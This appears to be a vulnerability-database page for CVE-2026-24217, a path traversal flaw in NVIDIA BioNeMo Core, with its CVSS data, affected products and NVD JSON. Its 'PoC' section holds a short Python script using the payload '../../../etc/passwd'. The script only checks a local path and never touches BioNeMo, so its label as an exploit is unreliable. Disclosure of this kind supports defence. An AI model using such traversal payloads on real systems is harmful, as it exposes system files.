Security Vulnerability Report
中文
CVE-2026-24217 CVSS 8.8 HIGH

CVE-2026-24217

Published: 2026-05-20 20:16:36
Last Modified: 2026-05-21 20:08:20

Description

NVIDIA BioNeMo Core for Linux contains a vulnerability where a user could cause a path traversal by loading a malicious file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:bionemo_framework:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA BioNeMo Core for Linux (具体受影响版本请参考官方安全通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os # Proof of Concept for CVE-2026-24217 # This script demonstrates how a malicious file path could be constructed # to exploit the path traversal vulnerability in NVIDIA BioNeMo Core. def create_malicious_payload(): # Constructing a path traversal sequence # The target is to load a file from a sensitive directory (e.g., /etc/passwd) # or to upload a file to a critical location. # Example payload for file loading function base_dir = "/var/bionemo/user_data/" malicious_file = "../../../etc/passwd" # Path traversal payload full_path = os.path.join(base_dir, malicious_file) # Normalize path to see where it actually points (simulating the vulnerable behavior) # In a vulnerable app, normalization might not happen or happen after logic checks actual_path = os.path.normpath(full_path) print(f"Attempting to load file from: {actual_path}") # Simulating the exploit attempt if os.path.exists(actual_path): print("SUCCESS: File found via path traversal!") else: print("FAIL: File not found.") if __name__ == "__main__": create_malicious_payload()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24217", "sourceIdentifier": "[email protected]", "published": "2026-05-20T20:16:36.487", "lastModified": "2026-05-21T20:08:20.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA BioNeMo Core for Linux contains a vulnerability where a user could cause a path traversal by loading a malicious file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-29"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:bionemo_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-04-03", "matchCriteriaId": "F88658A3-88E0-4972-931D-333FB874CD4F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24217", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5831", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24217", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}